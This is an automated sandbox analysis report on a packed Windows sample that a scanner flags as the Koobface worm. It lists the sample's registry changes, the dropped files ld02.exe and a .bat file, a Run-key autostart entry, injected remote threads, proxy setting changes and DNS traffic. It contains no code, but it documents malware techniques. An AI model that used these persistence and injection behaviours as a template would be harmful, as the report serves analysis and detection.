Anubis - Analysis Report

Analysis Report for b0e2f7d4c2281b965006fe8da742dba1


Summary:

Description | Risk
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions being performed automatically. | medium
Changes security settings of Internet Explorer: This system alteration could seriously affect the safety of browsing the World Wide Web. | medium
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users. | medium
Performs File Modification and Destruction: The executable modifies and destroys files which are not temporary. | high
Spawns Processes: The executable creates processes during execution. | low
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys. | low


Table of Contents


1. General Information

  - Information about Anubis' invocation  
Time needed: 244 s 
Report created: 03/20/09, 11:25:11 UTC 
Termination reason: Timeout 
Program version: 1.67.0 

1.a) - Network Activity

  -  Unknown UDP Traffic:  
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 94 - Transferred inbound Bytes: 411

2. sample.exe

  - General information about this executable  
Analysis Reason: Primary Analysis Subject 
Filename: sample.exe 
MD5: b0e2f7d4c2281b965006fe8da742dba1 
SHA-1: dd903395f2e7d2b04e5dc7e9b35760933cf29010 
File Size: 15360 Bytes
Command Line: "C:\sample.exe" 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Worm.Win32.Koobface (Sig-Id:469236)

2.a) sample.exe - Registry Activities

  - Registry Keys Created Or Opened:  
HKLM\​System\​CurrentControlSet\​Control\​Session Manager
HKLM\​System\​CurrentControlSet\​Control\​Session Manager

  - Registry Values Modified:  
Key Name New Value
HKLM\​System\​CurrentControlSet\​Control\​Session Manager  PendingFileRenameOperations  0x5c003f003f005c0043003a005c00730061006d0070006c0065002e006500 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

2.b) sample.exe - File Activities

  - Files Created:  
c:\353454543.bat
c:\windows\ld02.exe

  - Files Read:  
C:\sample.exe

  - Files Modified:  
c:\353454543.bat
c:\windows\ld02.exe

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\cmd.exe
C:\Windows\AppPatch\sysmain.sdb
c:\353454543.bat
c:\windows\ld02.exe

2.c) sample.exe - Process Activities

  - Processes Created:  
Executable Command Line
c:\windows\ld02.exe   
  c:\windows\ld02.exe 
C:\WINDOWS\system32\cmd.exe   
  c:\353454543.bat 

  - Remote Threads Created:  
Affected Process
c:\windows\ld02.exe
C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\windows\ld02.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\windows\ld02.exe

3. ld02.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: ld02.exe 
Command Line: c:\windows\ld02.exe 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Normaliz.dll  0x008F0000  0x00009000 
C:\​WINDOWS\​system32\​iertutil.dll  0x42990000  0x00045000 
C:\​WINDOWS\​system32\​wininet.dll  0x42C10000  0x000CF000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​hnetcfg.dll  0x662B0000  0x00058000 
C:\​WINDOWS\​System32\​mswsock.dll  0x71A50000  0x0003F000 
C:\​WINDOWS\​System32\​wshtcpip.dll  0x71A90000  0x00008000 
C:\​WINDOWS\​system32\​sensapi.dll  0x722B0000  0x00005000 
C:\​WINDOWS\​system32\​MSCTF.dll  0x74720000  0x0004C000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​WINMM.dll  0x76B40000  0x0002D000 
C:\​WINDOWS\​system32\​rtutils.dll  0x76E80000  0x0000E000 
C:\​WINDOWS\​system32\​rasman.dll  0x76E90000  0x00012000 
C:\​WINDOWS\​system32\​TAPI32.dll  0x76EB0000  0x0002F000 
C:\​WINDOWS\​system32\​RASAPI32.dll  0x76EE0000  0x0003C000 
C:\​WINDOWS\​system32\​DNSAPI.dll  0x76F20000  0x00027000 
C:\​WINDOWS\​system32\​WLDAP32.dll  0x76F60000  0x0002C000 
C:\​WINDOWS\​System32\​winrnr.dll  0x76FB0000  0x00008000 
C:\​WINDOWS\​system32\​rasadhlp.dll  0x76FC0000  0x00006000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 

3.a) ld02.exe - Registry Activities

  - Registry Keys Deleted:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating\​.Default
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating\​.Current
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating

  - Registry Values Modified:  
Key Name New Value
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  sysldtray  c:\windows\ld02.exe 
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings  ProxyEnable 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common AppData  C:\​Documents and Settings\​All Users\​Application Data 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Internet Explorer\Main  tp  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cookies  C:\​Documents and Settings\​user\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  History  C:\​Documents and Settings\​user\​Local Settings\​History 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  MigrateProxy 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  ProxyEnable 
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  SavedLegacySettings  0x460000006800000001000000000000000000000000000000040000000000 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SOFTWARE\​Microsoft\​CTF\​SystemShared\​  CUAS 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  UrlEncoding  0x00000000 
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Winsock\​Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000 
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​Tracing  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  ConsoleTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableFileTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileDirectory  %windir%\​tracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  MaxFileSize  1048576 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  AllUsersProfile  All Users 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  DefaultUserProfile  Default User 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  ProfilesDirectory  %SystemDrive%\​Documents and Settings 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\​Documents and Settings\​user 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  CommonFilesDir  C:\​Program Files\​Common Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  ProgramFilesDir  C:\​Program Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common AppData  %ALLUSERSPROFILE%\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  PerUserItem 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ComputerName\​ActiveComputerName  ComputerName  USER 
HKLM\​System\​CurrentControlSet\​Control\​MediaProperties\​PrivateProperties\​Joystick\​Winmm  wheel 
HKLM\​System\​CurrentControlSet\​Control\​ProductOptions  ProductType  WinNT 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  ComSpec  %SystemRoot%\​system32\​cmd.exe 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  FP_NO_HOST_CHECK  NO 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  NUMBER_OF_PROCESSORS 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  OS  Windows_NT 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_ARCHITECTURE  x86 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_LEVEL 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_REVISION  0303 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  Path  %SystemRoot%\​system32;%SystemRoot%;%SystemRoot%\​System32\​Wbem 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TEMP  %SystemRoot%\​TEMP 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TMP  %SystemRoot%\​TEMP 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  windir  %SystemRoot% 
HKLM\​System\​CurrentControlSet\​Services\​LDAP  LdapClientIntegrity 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Domain   
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Hostname  user 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  UseDomainNameDevolution 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  HelperDllName  %SystemRoot%\​System32\​wshtcpip.dll 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MaxSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MinSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  UseDelayedAcceptance 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters  WinSock_Registry_Version  2.0 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Num_Catalog_Entries 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  DisplayString  Tcpip 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  SupportedNameSpace  12 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  DisplayString  NTDS 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  LibraryPath  %SystemRoot%\​System32\​winrnr.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  SupportedNameSpace  32 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  DisplayString  Network Location Awareness (NLA) Namespace 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  SupportedNameSpace  15 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Next_Catalog_Entry_ID  1012 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Num_Catalog_Entries  11 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000001  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000002  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000003  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000004  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000005  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
